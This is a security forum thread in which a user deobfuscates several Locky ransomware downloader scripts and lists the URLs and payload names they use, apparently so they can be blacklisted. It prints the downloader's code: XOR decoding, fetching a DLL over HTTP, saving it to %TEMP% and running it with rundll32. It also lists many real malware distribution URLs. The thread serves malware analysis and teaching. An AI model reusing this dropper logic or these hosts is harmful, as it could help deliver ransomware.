{OVc9=HIi3;}
else

{OVc9=t2[HIi3];}
EGj.push(String["fromCharCode"](OVc9));
}
resultString=EGj["join"]("");
return resultString;
};

//Save the file to the HD after first decipher call
VGRA5 = function (VGRA9, VGRA11)
{

var VGRA2=WScript["CreateObject"]("ADODB.Stream");
VGRA2["type"] = 2;
VGRA2["Charset"] = 437;
VGRA2["open"]();
VGRA2["writeText"](VGRA4(VGRA11));
VGRA2["SaveToFile"](VGRA9, 2);
VGRA2["close"]();
};

// deobfuscation with XOR
VGRA6 = function (VGRA7)
{

for (var Tj=0; Tj < VGRA7["length"]; Tj++)
{

VGRA7[Tj] ^= VGRA8[Math.floor(Tj % VGRA8.length)];
}
return VGRA7;
};

=> Calls from "normal" parts !

- var VGRA8 = VGRA3("McnUKv40gkyAZaLozJMn9Xgr40VGHhbj");

=> "McnUKv40gkyAZaLozJMn9Xgr40VGHhbj" : 'obfuscated' string

=> VGRA8 : Array of char codes deciphered by VGRA3 function and that will be used for the XOR part

- But, only char codes above, or equal, to 128 are changed :

var OVc9=VGRA10["charCodeAt"](Tj);

if (OVc9 < 128) {

var HIi3=OVc9;
=> keep the original char code
}
else {


var HIi3=t1[OVc9];
=> changes the char code
}

resultArray["push"](HIi3);

=> "McnUKv40gkyAZaLozJMn9Xgr40VGHhbj"

=> 77 99 110 85 75 118 52 48 103 107 121 65 90 97 76 111 122 74 77 110 57 88 103 114 52 48 86 71 72 104 98 106

=> none above, or equal, to 128 :​
=> then here, the result is an array of char codes of same chars :rolleyes:
- var nazadposmotrishvdrugzanzibar5FrankSinatra
= VGRA1(nazadposmotrishvdrugzanzibarloverIamChild);

- nazadposmotrishvdrugzanzibar5FrankSinatra = VGRA6(nazadposmotrishvdrugzanzibar5FrankSinatra);

- VGRA5(nazadposmotrishvdrugzanzibarloverIamChild, nazadposmotrishvdrugzanzibar5FrankSinatra );

2-4) Run parts :

First method :

nazadposmotrishvdrugzanzibar5rampart.Run("ru" + ("nazadposmotrishvdrugchicken", "nazadposmotrishvdrugprostate", "nazadposmotrishvdruglogistics", "nazadposmotrishvdruglexicon", "nd") + "l" + (nazadposmotrishvdrugzanzibar5StrokaParam2, "nazadposmotrishvdrugtoken", "nazadposmotrishvdrugunabated", "nazadposmotrishvdrugplacing", "nazadposmotrishvdrugablest", "l32") + " " + nazadposmotrishvdrugzanzibarloverIamChild + ",EnhancedStoragePasswordConfig", 0, false);

=> an obfuscated way to write :

ObjShell.Run("rundll32 " + path_file + ",EnhancedStoragePasswordConfig",0, false)

var nazadposmotrishvdrugzanzibar5HORDA17 = "FhsxVP";

var nazadposmotrishvdrugzanzibarolivia = [
nazadposmotrishvdrugzanzibar5lidgen,
=> "ActiveXObject"

nazadposmotrishvdrugzanzibar5sirdallos,

=> ExpandEnvironmentStrings

nikeFootballAir23("WEAGLEWEAGLEJVRFTWEAGLEWEAGLEVAl"),

=> %TEMP%

".d" + nazadposmotrishvdrugzanzibar5lololosh + nazadposmotrishvdrugzanzibar5lololosh,

=> ".d" + "l" + "l"

nikeFootballAir23("UnWEAGLEWEAGLEVuWEAGLEWEAGLE")
=> "Run"
];

=> This array is used for the run part. We can see the extension used.
path_file :

=> example : "C:\Users\\DardiM\AppData\Local\Temp\FhsxVP1.dll"
FhsxVP2.dll
FhsxVP3.dll

etc,...

=> one number by URL until a good payload is found

info.jpg

Second method coded, but not used here :

nazadposmotrishvdrugzanzibar5rampart[nazadposmotrishvdrugzanzibar5promises](nazadposmotrishvdrugzanzibarloverIamChild, nazadposmotrishvdrugzanzibar5chosen, true);
=> nazadposmotrishvdrugzanzibar5promises : "Run"
=> nazadposmotrishvdrugzanzibarloverIamChild : path_file
ObjShell.Run(path_file ,1, true);
2-5) Main part :

When we follow in the right order what the script is doing (step by step ) :

After a lot vars have been prepared with the real data :

var nazadposmotrishvdrugzanzibar5checheche = ["d3WEAGLEWEAGLEd3LmtpbWFiaXRlcy5jbWEAGLEWEAGLE20vZzY3ZWlobnJ2", "dGhlbWVvbmhhaS5jb20vZzY3ZWloWEAGLEWEAGLEbnJ2", "Ym9uemVyd2Vic29sdXRpb25zLmNvbSWEAGLEWEAGLE9nNjdlaWhucnY=",
"d3WEAGLEWEAGLEd3LnBvZGRhcnByb2WEAGLEWEAGLEZlc3Npb25hbC5jb20vZzY3ZWlobnJ2", "ZmxpZXJtYWdhcy5uZXQvZzY3ZWlobnJ2", "aW50b21pbS5jb20vZzY3ZWlobnJ2"];

=> tab of url_parts (we have seen there are incomplete)
var nazadposmotrishvdrugzanzibar5checheche1 = nazadposmotrishvdrugzanzibar5checheche.slice(0);

=> array of url_parts (we have seen that they are incomplete)
nazadposmotrishvdrugzanzibar5pereSubFunc(nazadposmotrishvdrugzanzibar5checheche1, nazadposmotrishvdrugzanzibar5SIDRENKOV, true);

=> function with :
- parameter 1 : array of urls_parts
- parameter 2 : the extension to be used : ".dll"
- parameter 3 : true
=> nazadposmotrishvdrugzanzibar5pereSubFunc :

=> this function purpose :

- build the whole URls

=> use a sub function nazadposmotrishvdrugzanzibar5_a2
- send the request
- save the obfuscated payload received, without extension (first decipher)
- deobfuscates it completely
- save it with the real extension after last decipher, if all is ok​
function nazadposmotrishvdrugzanzibar5pereSubFunc(
nazadposmotrishvdrugzanzibar5_a5,
=> array of urls_parts
nazadposmotrishvdrugzanzibar5_a6,
=> the extension to be used : ".dll"
nazadposmotrishvdrugzanzibar5_a7
=> Boolean, here : true
) {

if (nazadposmotrishvdrugzanzibar5TRUEFALSE) {
for (nazadposmotrishvdrugzanzibar5HORDA5 in nazadposmotrishvdrugzanzibar5_a5) {
nazadposmotrishvdrugzanzibar5HORDAI++;
try {

var nazadposmotrishvdrugzanzibar5HORDA6 = nazadposmotrishvdrugzanzibar5jji + nikeFootballAir23(nazadposmotrishvdrugzanzibar5_a5[nazadposmotrishvdrugzanzibar5HORDA5]) + "?DHVvPTpRF=wqxuXORJf";
=> "http://"+ nikeFootballAir23(array_of_urls_incomplete[index]) + "?DHVvPTpRF=wqxuXORJf";
if (
=> calls the sub function : returns true or false
nazadposmotrishvdrugzanzibar5_a2(

nazadposmotrishvdrugzanzibar5HORDA6,
=> URL

nazadposmotrishvdrugzanzibar5HORDA17 + nazadposmotrishvdrugzanzibar5HORDAI,
=> "FhsxVP" + current_index
=> example : "FhsxVP1" name for the payload


nazadposmotrishvdrugzanzibar5_a6,

=> ".dll" : extension

nazadposmotrishvdrugzanzibar5_a7

=> true
)
) {
break;
=> break if true (successful, then no need to try another url)
}
} catch (nazadposmotrishvdrugzanzibar5QvLfAvDBhv) {}
}
}
}
Sub function - deobfuscated :

f
unction nazadposmotrishvdrugzanzibar5_a2(url, temp_file_name, extension, Param4){
path_file = path + "/" + temp_file_name
=> example : "C:\Users\DardiM\AppData\Local\Temp/FhsxVP1"
=> ("/" => "\")

http.open("GET", url, false);

http.setRequestHeader("
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
http.send();

=> sends the request

stream = new
ActiveXObject("ADODB.Stream");
stream.open();

stream.type= 1;

stream.write(http.
ResponseBody);
=> writes the received data to a stream object

stream.position = 0;

stream.saveToFile(temp_file_name, 2);

=> saves the file without extension : obfuscated file

stream.close();

content_file = VAR1(temp_file_name);

=> Loads the file from HD, and call first decipher function

content_file = VAR6(content_file);

=> XOR part

file_length = content_file.length
;

if (file_length < 30000) return false;
=> returns to the main function => will try next URL

if (content_file[0] - 3 != 74 || content_file[1] - 5 != 85) return false;

=> 74 + 3 = 77 => M
=> 85 + 5 = 90 => Z
=> if not a good header "MZ" (exe or dll file) : returns to the main function (=> next url)

real_file = temp_file_name + extension;

VAR5(real_file , content_file);

=> second decipher, and saves the file with real name (=> with extension)

if (Param4) {

=> if the Param4 is true (in this sample it is this value) : use of rundll32

objeShell.Run("rundll32 " + real_file + ",EnhancedStoragePasswordConfig", 0, false);
=> EnhancedStoragePasswordConfig : <entrypoint>
} else {

=> if the parameter 4 is false : "normal" run

objeShell.Run(real_file , 1, true);
=> file that can be run
}

return true;
}
3) Conclusion :

- Still not difficult to find important data, in this family of script :

- The parts used to deobfuscate the payload
- URLs used
- Payload name​

=> find the pattern used to obfuscate some important strings :

=> find replace :
Here, it was :
kuloma["replace"](/WEAGLEWEAGLE/g, '')
=> or the name of the decoding function, the one you can see several times with a strange string as parameter :p
Example :
nikeFootballAir23("TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMCk=");
=> Find the declaration of nikeFootballAir23 function :
=> looking inside : /WEAGLEWEAGLE/g,​
- The same method is used for :

27991851_Invoice.jse

- http: //139.162.29.193/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //sheela.diet/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //www .hayatesabz.ir/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //conceptkitchens.co.uk/g67eihnrv,?mieVBwvCQ=ExHBtOmHHgv
- http: //fliermagas.net/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
- http: //intomim.com/g67eihnrv?mieVBwvCQ=ExHBtOmHHgv
=> Payload : mujVqbry1.gll (number : 1 to 6)

var nazadposmotrishvdrugnewcomer5HORDA17 = "mujVqbry";
7171450.wsf

- http: //italics.in/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //www. kimabites.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //dollsdelight.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //bonzerwebsolutions.com/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //fliermagas.net/g67eihnrv?UMPLUb=UHspjGTxBe
- http: //intomim.com/g67eihnrv?UMPLUb=UHspjGTxBe


=> Payload : MpdhLm1.dll (number : 1 to 6)

var nazadposmotrishvdrugshell5HORDA17 = "MpdhLm";
5190512.wsf

- http ://www .kimabites.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://themeonhai.com/g67eihnrv?DHVvPTpRF=wqxuXORJf",
- http ://bonzerwebsolutions.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://www .poddarprofessional.com/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://fliermagas.net/g67eihnrv?DHVvPTpRF=wqxuXORJf
- http ://intomim.com/g67eihnrv?DHVvPTpRF=wqxuXORJf

=> Payload : FhsxVP1.dll (number : 1 to 6)

var nazadposmotrishvdrugzanzibar5HORDA17 = "FhsxVP";
For the next, another pattern is used :

FAX_0780.wsf
=> /VOEVODAHO/
g,

- http: //armco-inspections.com/7fg3g?iUGfOoaD=goBNFokAlh
- http: //simperizinan.sragenkab.go.id/7fg3g?iUGfOoaD=goBNFokAlh
- http: //davepotterhonda.com.au/7fg3g?iUGfOoaD=goBNFokAlh
- http ://primermundo.net/7fg3g?iUGfOoaD=goBNFokAlh
- http: //skartusnea.net/7fg3g?iUGfOoaD=goBNFokAlh
- http: //palaschoga.com/7fg3g?iUGfOoaD=goBNFokAlh
=> Payload obfuscated : OpIINzQQQGK1.dll (number : 1 to 6)

var opfuagracleansing5HORDA17 = "OpIINzQQQGK";
The extension is a bit more hidden : same technique but the ".d" was in clear :

Now, here :

".d" => "\u002Ed"
var opfuagracleansingolivia = [opfuagracleansing5lidgen, opfuagracleansing5sirdallos,nikeFootballAir23("VOEVODAHOJVRFTVOEVODAHOVAl"), "\u002Ed"+opfuagracleansing5lololosh+opfuagracleansing5lololosh, nikeFootballAir23("UnVOEVODAHOVuVOEVODAHO")];

"\u002Ed"+opfuagracleansing5lololosh+opfuagracleansing5lololosh
=> ".d + "l" + "l"
=> ".dll"
=> Payload : OpIINzQQQGK1.dll (number : 1 to 6)
=> as easy to retrieve important info (to Black list them)​

- payload : Locky ransomware with .thor extension

- EnhancedStoragePasswordConfig is the name of the Entry point
- it uses a parameter ( true or false) to select how shell.Run is used (not the same parameters)

=> compatible with dll and exec files​
The aim of this post was not to deobfuscate or explain all the parts of this family of script (already done on previous analysis). Just to show how it evolved, with very recent samples (hum I don't think 'evolved ' is the good name :p )

Edited :
last summary (using the steps described in the current thread)
- sample from 04/11/2016 (dd/mm/yy)

https://malwaretips.com/threads/5-x...y-thor-downloaders-updated.64894/#post-561313
-sample from 08/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/6-x...rs-oct-27-to-nov-8-updated.64894/#post-563027
- 2 Samples from 29/11/2016 (dd/mm/yy)
https://malwaretips.com/threads/28-11-2016-20.65943/
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Great job, this time a trio! Well done @DardiM, makes a good read, as always!
P.S. Someone seems to have a passion for sneakers and for a German manufacturer of cars with a star emblem...
Thanks :)

Yes, the names of var used (to make it harder to 'follow'), are fun :)
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/04-11-2016-8.65142/
Thanks to @silversurfer

N9F4D73.wsf
https://www.hybrid-analysis.com/sam...4e1bfe40dbdccdaa1e6386dc0a7?environmentId=100
Antivirus scan for f7b5576d26bb95d649ef6657f3c56885d71d24e1bfe40dbdccdaa1e6386dc0a7 at 2016-11-04 17:05:09 UTC - VirusTotal

=> Locky (.thor) downloader

Using the steps described in the first post on this current thread ( => above parts) :

Some changes:

In decoding function : MAINTH(obfuscated_string)

- 2 patterns can be removed from obfuscated strings :
- /SAMURAYDJEK/g
- /VOROBEYDJEK/g​

var ListaRoundingRoundigspecious5checheche = [
"bW9zcGkucnUvNWSAMURAYDJEKc0ZjM=",
"Z2VvbWF0cml4Lm5sLzVnSAMURAYDJEKNGYz",
"ZnJ1bWllbC5jbC81ZzRmMSAMURAYDJEKw==",
"Z2UzZXBtSAMURAYDJEKdXAucnUvNWc0ZjM=",
"am9yZ2V5b3VkLmNvbS81ZzRmMw==",
"YWVvbm1hY29uLm5ldC81ZzRmMw=="​
];
var ListaRoundingRoundigspecious5checheche1 = ListaRoundingRoundigspecious5checheche.slice(0);


directive();

=> new function to obfuscate a bit more

function directive() {
ListaRoundingRoundigspeciousEtoAvira(ListaRoundingRoundigspecious5checheche1, ListaRoundingRoundigspecious5SIDRENKOV);
return {
restrict: 'A',
require: ['^ngModel', '^form'],
compile: function() {
return {
};
}
};
}
See the first post for more details :

=> main function :

ListaRoundingRoundigspeciousEtoAvira
=> sub function :

ListaRoundingRoundigspecious5_a2
=> this time, only one run method available : for dll

- Shell.Run ("rundll32 %TEMP%\pPRCjkh1.dll" ,GetLine , 0 , false)

=> Entry Point : GetLine

URLs :

- http ://mospi.ru/5g4f3?QFKoqtU=rniwyi
- http ://geomatrix.nl/5g4f3?QFKoqtU=rniwyi
- http ://frumiel.cl/5g4f3?QFKoqtU=rniwyi
- http ://ge3epmup.ru/5g4f3?QFKoqtU=rniwyi
- http ://jorgeyoud.com/5g4f3?QFKoqtU=rniwyi
- http ://aeonmacon.net/5g4f3?QFKoqtU=rniwyi


Payload : pPRCjkh1.dll (the number can be from 1 to 6 : 1 by URL tested)

var ListaRoundingRoundigspecious5HORDA17 = "pPRCjkh";
 
Last edited:

tim one

Level 21
Verified
Honorary Member
Top Poster
Malware Hunter
Jul 31, 2014
1,086
I do not understand that language but thanks for sharing:(
Many malware have part of the code obfuscated to complicate the work of analysis of possible researchers, @DardiM in our case.;)
Most of the code is then unusable and it must be deobffuscated while a part may be executable. Depending on the malware type, this is the code of the first procedure that, once performed, will make the executable code of the second, third and fourth routine, etc. So each function will reveal all the code of the malware, loading it into memory by running it.
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Many malware have part of the code obfuscated to complicate the work of analysis of possible researchers, @DardiM in our case.;)
Most of the code is then unusable and it must be deobffuscated while a part may be executable. Depending on the malware type, this is the code of the first procedure that, once performed, will make the executable code of the second, third and fourth routine, etc. So each function will reveal all the code of the malware, loading it into memory by running it.
Well explained :)

I will just add , for example for script-based malware : "and also to complicate the detection from security tools" (heuristics methods, etc)

(n.b.: researchers => I'am just a puzzle lover ;) )
I do not understand that language but thanks for sharing:(
Thanks for you thanks :)

(I always put at the end URL(s) to be blacklisted and payload name(s), I hope it can help even if the deobfuscation part is not understood)
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/08-11-2016-11.65243/
Thanks to @Der.Reisende

NGC817313-3261.wsf
Antivirus scan for 700208d26ebd0f933ae88c1be5640dc20e19250baffd0c0f0a403af2e72bca1e at 2016-11-08 08:26:33 UTC - VirusTotal

=> Locky (.thor) downloader

Using the steps described in the first post on this current thread ( => above parts) :

Some changes:

In decoding function : MAINTH(obfuscated_string)

- 2 patterns can be removed from obfuscated strings :
- /CHAYDVOEM/g
- /VOROBEYDJEK/g​

var cvetik7cvetikrecordings5checheche = [
"ZW5hbGFCHAYDVOEMiLmNvbS85OHluaGNl",
"Z292b3Jva2htLnJ1CHAYDVOEMLzk4eW5oY2U=",
"ZnJ2ci5jb20uYXIvOCHAYDVOEMTh5bmhjZQ==",
"Z3Vtb3JjYS5jb20vCHAYDVOEMOTh5bmhjZQ==",
"Y296eWN1bG15LmNvbS85OHluaGNl",
"dmVsdGVwZWxldy5uZXQvOTh5bmhjZQ=="​
];

var cvetik7cvetikrecordings5checheche1 = cvetik7cvetikrecordings5checheche.slice(0);

directive();

=> new function to obfuscate a bit more

function directive() {

cvetik7cvetikrecordingsEtoAvira(cvetik7cvetikrecordings5checheche1, cvetik7cvetikrecordings5SIDRENKOV);
return {

restrict: 'A',
require: ['^ngModel', '^form'],
compile: function() {
return {
};
}
};
}
See the first post for more details :
=> main function :

cvetik7cvetikrecordingsEtoAvira

- parameter 1 : cvetik7cvetikrecordings5checheche1

=> Tab of URLs parts that are Base64 encoded
- parameter 2 : .dll

=> var cvetik7cvetikrecordings5SIDRENKOV = cvetik7cvetikrecordingsShivaua(cvetik7cvetikrecordingsolivia);

=> var cvetik7cvetikrecordingsolivia = [MAINTH("QWN0aXZlWE9iamVjdA=="),
cvetik7cvetikrecordings5sirdallos,MAINTH("CHAYDVOEMJVRFTCHAYDVOEMVAl"),
"\x2E\x64\x6C\x6C",
MAINTH("UnCHAYDVOEMVuCHAYDVOEM")];

=> "\x2E\x64\x6C\x6C" : escape unicode
=> ".dll"
=> sub function :

cvetik7cvetikrecordings5_a2
=> this time, only one run method available : for dll

- Shell.Run ("rundll32 %TEMP%\XOMDtPqa1.dll" ,makefile, 0 , false)

=> Entry Point : makefile

URLs :

var cvetik7cvetikrecordings5HORDA6 =cvetik7cvetikrecordings5jji + MAINTH(cvetik7cvetikrecordings5_a5[cvetik7cvetikrecordings5HORDA5]) + "?lwPsCqcIT=aMcXTDK";

=> cvetik7cvetikrecordings5jji = "http://";

URLs once build :

- http ://enalab.com/98ynhce?lwPsCqcIT=aMcXTDK
- http ://govorokhm.ru/98ynhce?lwPsCqcIT=aMcXTDK
- http ://frvr.com.ar/98ynhce?lwPsCqcIT=aMcXTDK
- http ://gumorca.com/98ynhce?lwPsCqcIT=aMcXTDK
- http ://cozyculmy.com/98ynhce?lwPsCqcIT=aMcXTDK
- http ://veltepelew.net/98ynhce?lwPsCqcIT=aMcXTDK​


Payload : XOMDtPqa1.dll (the number can be from 1 to 6 : 1 by URL tried)

var cvetik7cvetikrecordings5HORDA17 = "XOMDtPqa";​
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/28-11-2016-20.65943/
Thanks to @Der.Reisende

For a complete explanation of this family, you can look at the first post.
( I also show there the hidden part that is used to deobfuscate the payload, once the obfuscated version is downloaded and saved on the %TEMP% folder without the . dll extension).


Following are only the differences from precedent versions.

1) 17591227.wsf

Using the steps described in the first post on this current thread ( => above parts) :

Some changes:

In decoding function : VIHUHOL(obfuscated_string)


- 2 patterns can be removed from obfuscated strings :
- /LOCATOR/g
- /PLEBEY/g => this one is not used
var DoctorStrangeerica5checheche = [
"cmVsaWFuY2VjbG91ZHMuY29tLzg3bmZ0Mw=LOCATOR=",
"cWluZ2x2OTLOCATORk5LmNvbS84N25mdDM=",
"cHJvcmFja3Mucm8vOLOCATORDduZnQz",
"c3BhcnRhbndvbWFuLnJ1LzgLOCATOR3bmZ0Mw==",
"ZGhlcmlncm91dC5jb20vODduZnQz",
"bGV2ZWVhbWJvbi5uZXQvODduZnQz"​
];
=> Base64 encoded string + pattern "LOCATOR" added on some part
=> array of URLs parts

varDoctorStrangeerica5checheche 1 = DoctorStrangeerica5checheche .slice(0);

directive();

=> new function to obfuscate a bit more

function directive() {

DoctorStrangeericaNMTPIKVOM(DoctorStrangeerica5checheche1, DoctorStrangeerica5SIDRENKOV);
return {

restrict: 'A'
};
}

See the first post for more details :

=> main function :

DoctorStrangeericaNMTPIKVOM


- parameter 1 : DoctorStrangeerica5checheche1


=> Tab of URLs parts that are Base64 encoded
- parameter 2 : .dll


=> var DoctorStrangeerica5SIDRENKOV = DoctorStrangeericalusiya_GOP(DoctorStrangeericaolivia)

Here :

var DoctorStrangeericaolivia = [VIHUHOL("QWN0aXZlWE9iamVjdA=="), // "ActiveXObject"
DoctorStrangeerica5sirdallos, // "ExpandEnvironmentStrings"
VIHUHOL("LOCATORJVRFTLOCATORVAl"), // "%TEMP%"
".d"+"ll",
VIHUHOL("
UnLOCATORVuLOCATOR")]; // "Run"
And DoctorStrangeericalusiya_GOP(DoctorStrangeericaolivia)

Retrieves the extension :

=> ".d"+"ll"
=> ".dll"
=> sub function :


DoctorStrangeerica5_a2(
DoctorStrangeerica5HORDA6,
DoctorStrangeerica5HORDA17+DoctorStrangeerica5HORDAI,
DoctorStrangeerica5_a6
)

- DoctorStrangeerica5HORDA6 : "http://" + current_decoded_url_part + "?GmYwjWiVE=CdLPpGM"
- DoctorStrangeerica5HORDA17+DoctorStrangeerica5HORDAI : "PgeDMC" + current_index
- DoctorStrangeerica5_a6 : ".dll"
Run part :
DoctorStrangeericapickun_dickun['Run'](DoctorStrangeericaaaaeo.concat(DoctorStrangeericaaaae,",pokpok"),0,false);


- Shell.Run ("rundll32 %TEMP%\PgeDMC1.dll" ,pokpok, 0 , false)

=> Entry Point : pokpok
URLs :
URLs once build :

- http ://relianceclouds.com/87nft3?GmYwjWiVE=CdLPpGM
- http ://qinglv999.com/87nft3?GmYwjWiVE=CdLPpGM
- http ://proracks.ro/87nft3?GmYwjWiVE=CdLPpGM
- http ://spartanwoman.ru/87nft3?GmYwjWiVE=CdLPpGM
- http ://dherigrout.com/87nft3?GmYwjWiVE=CdLPpGM
- http ://leveeambon.net/87nft3?GmYwjWiVE=CdLPpGM
Payload : PgeDMC1.dll (the number can be from 1 to 6 : 1 by URL tried)

var cvetik7cvetikrecordings5HORDA17 = "PgeDMC1";
2) 86291326.wsf :

Same script with different URLs and Payload name :

URLs :

- http ://right-livelihoods.org/87nft3?AWSqYDxSeJ=mssAjGqU
- http ://restauranttajmahal.ca/87nft3?AWSqYDxSeJ=mssAjGqU
- http ://skuter.c0.pl/87nft3?AWSqYDxSeJ=mssAjGqU
- http ://thoseads.com/87nft3?AWSqYDxSeJ=mssAjGqU
- http ://dherigrout.com/87nft3?AWSqYDxSeJ=mssAjGqU
- http ://leveeambon.net/87nft3?AWSqYDxSeJ=mssAjGqU
Payload :

var DoctorStrangemuhammad5HORDA17 = "AmkBSJafw";

AmkBSJafw1.dll (the number can be from 1 to 6 : 1 by URL tried)​
 
Last edited:

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
I'm starting to understand a bit more on how you are able to find patterns from the obfuscated string. I am just amazed how you can spot and locate them. Thanks for a great lesson, it was very education and a good read with your analysis with the 3 samples.
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I'm starting to understand a bit more on how you are able to find patterns from the obfuscated string. I am just amazed how you can spot and locate them. Thanks for a great lesson, it was very education and a good read with your analysis with the 3 samples.
Happy you liked these posts !
Happy Christmas !
:)
 

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
Merry Christmas to you too. I am really curious about this : What has been the most pattern you have seen on a malware sample? These 3 samples have have 2, which is not match for a puzzle lover like you, but what has been the toughest malware sample you have encountered and how many pattern are in those?
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Merry Christmas to you too. I am really curious about this : What has been the most pattern you have seen on a malware sample? These 3 samples have have 2, which is not match for a puzzle lover like you, but what has been the toughest malware sample you have encountered and how many pattern are in those?
There are only 2 patterns at max in this family, for some string obfuscation, but the more difficult was all the methods they used for other parts useless and useful, and understand where are and what do each part.
Here, more complete analyses of the whole code :
https://malwaretips.com/threads/dow...om-malware-vault-1-8-16-13.61898/#post-530229
https://malwaretips.com/threads/824643807708-wsf-dropper-js_nemucod-smk2.62677/
https://malwaretips.com/threads/deo...4-malware-vault-wsf-dropper-js_nemucod.62938/
Once understood their all methods parts, I made these 3 quick analysis to show how to quickly find the urls, payloads.
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
Merry Christmas to you too. I am really curious about this : What has been the most pattern you have seen on a malware sample? These 3 samples have have 2, which is not match for a puzzle lover like you, but what has been the toughest malware sample you have encountered and how many pattern are in those?

These samples where analyzed without debugger, only with notepad++ (then only in static for all parts : I had to know at each moment each value in each var, part, etc)

A good trick they used :
Array of important strings, but with the content that changes when a string is retrieved, then if you don't follow well each part, you can't know at one moment what string is retrieved.
=> .pop function
removes the last element from an array and returns that element. This method changes the length of the array
=> .shift function
returns a shallow copy of a portion of an array into a new array object selected from begin to end (end not included). The original array will not be modified.
and importants objects created at this moment

For these samples, I only have put parts that are "useful", a lof parts where only put inside to disturbe the brain lol
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top